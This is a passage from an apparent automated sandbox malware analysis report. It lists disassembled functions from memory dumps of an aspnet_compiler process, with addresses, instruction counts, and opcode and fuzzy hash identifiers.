                                                                                                        • Opcode Fuzzy Hash: 0d636d907e1842cde3c8614711c17b8334d9039cc6d41882c0c3bfca4fd857e2
                                                                                                        • Instruction Fuzzy Hash: 2F310232B002059FD724DFB8C888A6EFBFAABC4304F548629D106D3254E771D941CB91
                                                                                                        Function 017892C5 Relevance: .1, Instructions: 89COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                        • Instruction ID: 444d640126def3b5e41a2f249a60f8e7b6c01405d9bf08e39ad034f36f3fab38
                                                                                                        • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                        • Instruction Fuzzy Hash: 3B31ABB160820A8FCB02EF28D84495ABBE9FF99714F000569FD51D73A2DB30DD15CBA2
                                                                                                        Function 0177C156 Relevance: .1, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c5108e3738c51dca5451eec049ec66bf2175edc1bac04e7a68cfa9c53da4afeb
                                                                                                        • Instruction ID: 517c59152b39763b462e5a93f566155737d8aa61cc5ecb30e52614b475483131
                                                                                                        • Opcode Fuzzy Hash: c5108e3738c51dca5451eec049ec66bf2175edc1bac04e7a68cfa9c53da4afeb
                                                                                                        • Instruction Fuzzy Hash: E13127B15002059BDB31AF6CC844BA9FBB4EF50314F9481E9D9499B386EA34DA86CF90
                                                                                                        Function 0183C3CD Relevance: .1, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                        • Instruction ID: 2ff44218249816df1510c32c43ea109d0741078484aa67de1442fdb84ea46978
                                                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                        • Instruction Fuzzy Hash: 85212D3660065266CF15ABA99844ABAFFB4EFC0710F44841FFAD5DB591E734DA40C3E1
                                                                                                        Function 0177E420 Relevance: .1, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 640cd05b6e544c51cf22c24a68d18d0fe75eebfb0c0f2039fd49460508cb59fa
                                                                                                        • Instruction ID: 7f31132332863c7f9654bf344cc5a3e3844645cb4176e86677960e14c519dc15
                                                                                                        • Opcode Fuzzy Hash: 640cd05b6e544c51cf22c24a68d18d0fe75eebfb0c0f2039fd49460508cb59fa
                                                                                                        • Instruction Fuzzy Hash: 8631D431A0052C9BDF31DB18CC45FEEF7B9AB15740F0101E5F655AB290DA749E808F90
                                                                                                        Function 017B4588 Relevance: .1, Instructions: 87COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                        • Instruction ID: e9ae08a1f276f4322ebc396e1995c080036b87c83265af641379895cd3363eb6
                                                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                        • Instruction Fuzzy Hash: 27216031A00609EBCB15CF58C9C4ADAFBA5FF48718F108069EE169B246D771EA458B90
                                                                                                        Function 017B44B0 Relevance: .1, Instructions: 87COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 51725e9912d0b02923400aeafe8ce182984a0a85f330f353f5d920ad956dc847
                                                                                                        • Instruction ID: 7253751ea96f10ee794ec3236dfee372e5b26438f3112d5008070b4afdf29781
                                                                                                        • Opcode Fuzzy Hash: 51725e9912d0b02923400aeafe8ce182984a0a85f330f353f5d920ad956dc847
                                                                                                        • Instruction Fuzzy Hash: 1521D572604B459BCB21CF18C880BABF7E5FF88760F104519FD569B646D730EA00CBA2
                                                                                                        Function 0177E388 Relevance: .1, Instructions: 86COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                        • Instruction ID: 814f51a40f4bd81bb72ba5480244f4d8db63d4752ba46c63b3ed2a4ec091cb42
                                                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                        • Instruction Fuzzy Hash: 52317A31600605EFEB21CFA8C984F6AB7B9EF85354F1445A9E552CB290EB30EE41CB91
                                                                                                        Function 017BD530 Relevance: .1, Instructions: 85COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 77fe9d51865b4aad3a5b92d399ad0ab68e002ccb43a235bbcdc0c50bb77402ff
                                                                                                        • Instruction ID: 65d6b24803ad57c8dca4f71467b994112951d4d7584ce7dc0365e4a301e4c68d
                                                                                                        • Opcode Fuzzy Hash: 77fe9d51865b4aad3a5b92d399ad0ab68e002ccb43a235bbcdc0c50bb77402ff
                                                                                                        • Instruction Fuzzy Hash: 682124715047019BDB20FBA8D988F57F7E8AF64798F100829FA05C7295FB30D908CBA2
                                                                                                        Function 017AF32A Relevance: .1, Instructions: 79COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                        • Instruction ID: 7b8db29563787eab49fac90ab4f2f158a2115d66a8da0024535585c23b3193a7
                                                                                                        • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                        • Instruction Fuzzy Hash: D6219D722012019FD719DF29C845B6AFBE9EF95365F55826DE10A8B290EBB0E801CB94
                                                                                                        Function 0180019F Relevance: .1, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c4f327c8e2aaa30f396de665c7cc35fce33057fd10ce9aac6ac64c3272827c7e
                                                                                                        • Instruction ID: d06a924ed0abc3c14d4595c41f44bb06a9fb3b807a734d4ab86281290b30278c
                                                                                                        • Opcode Fuzzy Hash: c4f327c8e2aaa30f396de665c7cc35fce33057fd10ce9aac6ac64c3272827c7e
                                                                                                        • Instruction Fuzzy Hash: 6E219C71600649AFDB16DB6CDC44F6AB7A8FF48780F140069F944DB691D634EE40CBA8
                                                                                                        Function 01800283 Relevance: .1, Instructions: 74COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bfb423602e6b869b30de3ca9b0de419bf9c1c6d2568cb935c47ded0bbc7e96f3
                                                                                                        • Instruction ID: bea0169cd2ab903a5d93e96ab552219ca7e38aeb5bcb864829880f727aabdebc
                                                                                                        • Opcode Fuzzy Hash: bfb423602e6b869b30de3ca9b0de419bf9c1c6d2568cb935c47ded0bbc7e96f3
                                                                                                        • Instruction Fuzzy Hash: D621A17250424A9BDB13EF69DC48F6BFBDCAF91384F094466BD80C7291D734DA48C6A2
                                                                                                        Function 017BA30B Relevance: .1, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fd5261754f9e4e0de89cd7f123ea861f4de96d5a1226cc06b869e3ae19bbed43
                                                                                                        • Instruction ID: 8385872edd94754b2f519f5d2a1a175de09e060a92b36c241ddaeb21672d8f1a
                                                                                                        • Opcode Fuzzy Hash: fd5261754f9e4e0de89cd7f123ea861f4de96d5a1226cc06b869e3ae19bbed43
                                                                                                        • Instruction Fuzzy Hash: 4621A975201B419FCB29DF29C840B46B7F5BF08B04F24846CA509CBB61E331E942CF94
                                                                                                        Function 017A15A9 Relevance: .1, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                        • Instruction ID: 2f950a39abf075d0d06e28a8b32084ec1787a87140315e2b792b44553ebf3e79
                                                                                                        • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                                                                                                        • Instruction Fuzzy Hash: F421F371601686DFE7128BADC94CF21FBE9AF48340F2900A1ED45CB292E734DC40C650
                                                                                                        Function 017B0124 Relevance: .1, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                        • Instruction ID: 24876822de547ec296771a9ab07681bc3c4c66781e2462c82723f91c29e75bab
                                                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                        • Instruction Fuzzy Hash: 7611DD72601609AFEB269A48C884FDFFBB8EB80754F100029FA019F180E771ED44CB60
                                                                                                        Function 01788770 Relevance: .1, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a016ca9ec47e3d917283992cddbf101aafb804bd186fa9357315989248388407
                                                                                                        • Instruction ID: 3d9f6a397066579b4700b28ce6b74b12e58a698aa9acc5a4976274d1609894fb
                                                                                                        • Opcode Fuzzy Hash: a016ca9ec47e3d917283992cddbf101aafb804bd186fa9357315989248388407
                                                                                                        • Instruction Fuzzy Hash: AE11C8317406159BEB11EF8DC4C0916FBF5AF46B14B98406EED08DF305D6B1D901C791
                                                                                                        Function 017880E9 Relevance: .1, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1aa2351c1582559abf97c6abcaa9f2a83c75ba2ff835735f622615c49329dcd3
                                                                                                        • Instruction ID: 26d16d60ef8f884ab76a9384f2314cde73324e254c54eaf0920ff3551657f358
                                                                                                        • Opcode Fuzzy Hash: 1aa2351c1582559abf97c6abcaa9f2a83c75ba2ff835735f622615c49329dcd3
                                                                                                        • Instruction Fuzzy Hash: 53216D75A40206DFCB14DF98C581AAEFBB6FB88318F6441ADD105AB311DB71AE06CBD1
                                                                                                        Function 01779240 Relevance: .1, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5c7237acb4ca07a1737f5297cc684602d60f6f77800073b66e9b914401490d70
                                                                                                        • Instruction ID: 97d8ffb24d2ecb38c4701efa371d8a8ed0d0334f2dd17e93bf4af349853eee4d
                                                                                                        • Opcode Fuzzy Hash: 5c7237acb4ca07a1737f5297cc684602d60f6f77800073b66e9b914401490d70
                                                                                                        • Instruction Fuzzy Hash: 8611273A010645EEE7319F65E805A72B7F8FB69B90F604029E940DB358E334DE41DF65
                                                                                                        Function 017AB052 Relevance: .1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fbfb75e7cd29b6366a22bd8bae3d8acfd229ed0185008b9039f2c1242762f035
                                                                                                        • Instruction ID: 9043371b56e2fd8f94301114d4b02a1d0379c5a0228e1c745c5def4be97c7b9b
                                                                                                        • Opcode Fuzzy Hash: fbfb75e7cd29b6366a22bd8bae3d8acfd229ed0185008b9039f2c1242762f035
                                                                                                        • Instruction Fuzzy Hash: E301F972740701ABE710AB7A9C85F6BFBE8DFD5714F440579E705C7241EA70E900C621
                                                                                                        Function 01777330 Relevance: .1, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4bac29fc5705412094507ff4750d2b3a7fcf18827a1aaf867dd8249ff78a14f2
                                                                                                        • Instruction ID: c43259601d4867c409e36ee45ff90c0bc40e4b16926d2b3ffcd85e5bf43f48e1
                                                                                                        • Opcode Fuzzy Hash: 4bac29fc5705412094507ff4750d2b3a7fcf18827a1aaf867dd8249ff78a14f2
                                                                                                        • Instruction Fuzzy Hash: F611C271600755DFEB25CF58C84ABABB7E8EF44314F014829EA95CB251E735EC00CBA1
                                                                                                        Function 017AE53E Relevance: .1, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                        • Instruction ID: 1d9c19ce4ca4f394e2471f214f03ab5178fb33119e670fd91a84b3c658b32776
                                                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                        • Instruction Fuzzy Hash: 1B11C8722016C29BEB23973CE95CB25FBD4FB45758F2900E1DE81CBA52FB28C942C651
                                                                                                        Function 017AF2D0 Relevance: .1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 37a2398575bed281f4462c2646f256fcc36c807e857348fa3a1fa3d256cce920
                                                                                                        • Instruction ID: 6491425e320bf6381e3560873f2a2a0fb7bb26740a8da6531c30c8fc16aada9e
                                                                                                        • Opcode Fuzzy Hash: 37a2398575bed281f4462c2646f256fcc36c807e857348fa3a1fa3d256cce920
                                                                                                        • Instruction Fuzzy Hash: C511C2716006489BCB20DF69D888BAEF7A8FF44700F54007AE601EB356D639D941C750
                                                                                                        Function 018172A0 Relevance: .1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                        • Instruction ID: cc07a652b3cdb2cbf415ec20e7a698231c04b6213549dc5a1960f100310901d6
                                                                                                        • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                        • Instruction Fuzzy Hash: 8001B572140506BFE715AF56CC84E92FB6DFF64790B40052DF254825A4CB31ACA1CBA4
                                                                                                        Function 0177A250 Relevance: .1, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                        • Instruction ID: d88dbb1ec8ff6445139dd9c2ca656e10eefb8881e3074efcecf38ad2d80deed3
                                                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                        • Instruction Fuzzy Hash: C90126314097219BDF318F19D840A7ABBA4EF95B60B04892DFC958B281D331D800CB60
                                                                                                        Function 01786259 Relevance: .1, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7527c9119a8e6437da7d74e7ea2cd426c369b211f9f2717dbe872e388b0848e5
                                                                                                        • Instruction ID: 1c538a1705ecec5f3b741851ecd7c92c71e531bb413707a1cc069c1ce346c699
                                                                                                        • Opcode Fuzzy Hash: 7527c9119a8e6437da7d74e7ea2cd426c369b211f9f2717dbe872e388b0848e5
                                                                                                        • Instruction Fuzzy Hash: D9115E71545219ABDB25EF64CC46FE9B2B4AF04710F5041D8A318A60E1DB709E85CF84
                                                                                                        Function 0178208A Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                        • Instruction ID: 3870755995565ced868ba5a834696955829084fd4126c8f1d890791aabdcbb35
                                                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                        • Instruction Fuzzy Hash: 8A0124326001008BEF21AA2DD884B92F767BFC4701F5941A5ED06CF24BEA71CC82C3A0
                                                                                                        Function 0040AB7F Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 144f1f79a97f431fab744972ad23b55bc560392977c6b406ceac5c32ffc8bd3c
                                                                                                        • Instruction ID: 1a326f2e78a14fd8bf2f3f49984f91fdf6a38463a241603243c4d8234d6cd3c9
                                                                                                        • Opcode Fuzzy Hash: 144f1f79a97f431fab744972ad23b55bc560392977c6b406ceac5c32ffc8bd3c
                                                                                                        • Instruction Fuzzy Hash: 14F0A221058B4285EA11EF2558094EE7FB18985A64324576ED811DF1D3F31544B342CE
                                                                                                        Function 0177C020 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                        • Instruction ID: d711391b5627bcda13546fac86f943de2eeb78bbfe4c0030b804c52d46544006
                                                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                        • Instruction Fuzzy Hash: 6E01B53220070A9FEF3396A9D844EA7F7F9FFC9250F544419EA568B580EA70E541C7A0
                                                                                                        Function 017C20F0 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1a779c0711f6215bcc958aa1f548cc0691e242a1ea3ac3ddcc3c18364968f122
                                                                                                        • Instruction ID: cbab8eb73ab364ad6eb2ddef97e47c61682118c1080dc952aea5b34298b07704
                                                                                                        • Opcode Fuzzy Hash: 1a779c0711f6215bcc958aa1f548cc0691e242a1ea3ac3ddcc3c18364968f122
                                                                                                        • Instruction Fuzzy Hash: 22116D35A0020DAFDB15DF64C854EAEBBB5EB84740F00409DEA069B390E635AE11CB90
                                                                                                        Function 017BE5CF Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b42c7e2ae50e03a7726885668eff56b9345d02c464d81d399d5287f2e5f5e072
                                                                                                        • Instruction ID: e09348935da24886f25a79af05c5f5f359f22f5eb7238c67c3ddcc7bda6e537c
                                                                                                        • Opcode Fuzzy Hash: b42c7e2ae50e03a7726885668eff56b9345d02c464d81d399d5287f2e5f5e072
                                                                                                        • Instruction Fuzzy Hash: 8E01F771201A41BFD711BB39DD84E53F7ACFF956647100629B209C3662DB34EC05C6E0
                                                                                                        Function 01779353 Relevance: .0, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
